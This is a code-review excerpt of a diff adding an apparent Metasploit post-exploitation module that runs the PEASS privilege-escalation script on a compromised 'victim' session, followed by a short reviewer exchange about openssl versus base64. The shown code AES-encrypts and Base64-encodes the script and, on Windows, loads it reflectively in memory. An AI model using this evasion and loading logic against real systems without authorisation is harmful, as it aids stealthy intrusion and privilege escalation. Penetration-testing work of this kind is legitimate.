modules/post/multi/gather/peass.rb

```diff
@@ -0,0 +1,396 @@
+        OptString.new('PARAMETERS', [false, 'Parameters to pass to the script', nil]),
+        OptString.new('TIMEOUT', [false, 'Timeout of the execution of the PEASS script (15min by default)', 15 * 60]),
+        OptString.new('SRVHOST', [false, 'Set your metasploit instance IP if you want to download the PEASS script from here via http(s) instead of uploading it.', '']),
+        OptString.new('SRVPORT', [false, 'Port to download the PEASS script from using http(s) (only used if SRVHOST)', 443]),
+        OptString.new('SSL', [false, 'Indicate if you want to communicate with https (only used if SRVHOST)', true]),
+        OptString.new('URIPATH', [false, 'URI path to download the script from there (only used if SRVHOST)', '/' + rand(36**4).to_s(36) + '.txt'])
+      ]
+    )
+
+    @temp_file_path = ''
+  end
+
+  def run
+    ps_var1 = rand(36**5).to_s(36) # Winpeas PS needed variable
+
+    # Load PEASS script in memory
+    peass_script = load_peass
+    print_good('PEASS script successfully retrieved.')
+
+    # Obfuscate loaded PEASS script
+    if datastore['PASSWORD'].length > 1
+      # If no Windows, check if openssl exists
+      if !session.platform.include?('win')
+        openssl_path = cmd_exec('command -v openssl')
+        raise 'openssl not found on victim, unset the password of the module!' unless openssl_path.include?('openssl')
+      end
+
+      # Get encrypted PEASS script in B64
+      print_status('Encrypting PEASS and encoding it in Base64...')
+
+      # Needed code to decrypt from unix
+      if !session.platform.include?('win')
+        aes_enc_peass_ret = aes_enc_peass(peass_script)
+        peass_script_64 = aes_enc_peass_ret['encrypted']
+        key_hex = aes_enc_peass_ret['key_hex']
+        iv_hex = aes_enc_peass_ret['iv_hex']
+        decode_linpeass_cmd = "openssl aes-256-cbc -base64 -d -K #{key_hex} -iv #{iv_hex}"
+
+      # Needed code to decrypt from Windows
+      else
+        # As the PS function is only capable of decrypting readable strings
+        # in Windows we encrypt the B64 of the binary and then load it in memory
+        # from the initial B64. Then: original -> B64 -> encrypt -> B64
+        aes_enc_peass_ret = aes_enc_peass(Base64.encode64(peass_script)) # Base64 before encrypting it
+        peass_script_64 = aes_enc_peass_ret['encrypted']
+        key_b64 = aes_enc_peass_ret['key_b64']
+        iv_b64 = aes_enc_peass_ret['iv_b64']
+        load_winpeas = get_ps_aes_decr
+
+        ps_var2 = rand(36**6).to_s(36)
+        load_winpeas += "$#{ps_var2} = DecryptStringFromBytesAes \"#{key_b64}\" \"#{iv_b64}\" $#{ps_var1};"
+        load_winpeas += "$#{rand(36**7).to_s(36)} = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($#{ps_var2}));"
+      end
+
+    else
+      # If no Windows, check if base64 exists
+      if !session.platform.include?('win')
+        base64_path = cmd_exec('command -v base64')
```

Comment:
You can use `openssl enc -d -A -base64` instead.

Reply:
Is `openssl` more commonly installed than `base64`? If so, I'm open to it.